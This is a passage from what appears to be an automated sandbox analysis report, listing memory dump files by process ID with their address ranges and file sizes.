9.3MB
-
memory/892-59-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmpFilesize
8KB
-
memory/892-86-0x000000013FF90000-0x00000001408E8000-memory.dmpFilesize
9.3MB
-
memory/892-87-0x0000000077090000-0x0000000077239000-memory.dmpFilesize
1.7MB
-
memory/892-90-0x000000013F940000-0x000000013F950000-memory.dmpFilesize
64KB
-
memory/892-58-0x0000000077090000-0x0000000077239000-memory.dmpFilesize
1.7MB
-
memory/892-54-0x000000013FF90000-0x00000001408E8000-memory.dmpFilesize
9.3MB
-
memory/892-56-0x000000013FF90000-0x00000001408E8000-memory.dmpFilesize
9.3MB
-
memory/892-57-0x000000013FF90000-0x00000001408E8000-memory.dmpFilesize
9.3MB
-
memory/892-73-0x000000013F940000-0x000000013F950000-memory.dmpFilesize
64KB
-
memory/1112-65-0x000000001B770000-0x000000001BA6F000-memory.dmpFilesize
3.0MB
-
memory/1112-76-0x0000000002594000-0x0000000002597000-memory.dmpFilesize
12KB
-
memory/1112-77-0x000000000259B000-0x00000000025BA000-memory.dmpFilesize
124KB
-
memory/1112-60-0x0000000000000000-mapping.dmp
-
memory/1112-74-0x0000000002594000-0x0000000002597000-memory.dmpFilesize
12KB
-
memory/1112-64-0x000007FEF3380000-0x000007FEF3EDD000-memory.dmpFilesize
11.4MB
-
memory/1112-62-0x000007FEF3EE0000-0x000007FEF4903000-memory.dmpFilesize
10.1MB
-
memory/1112-75-0x000000000259B000-0x00000000025BA000-memory.dmpFilesize
124KB
-
memory/2024-71-0x0000000000000000-mapping.dmp
-
memory/2036-68-0x0000000000000000-mapping.dmp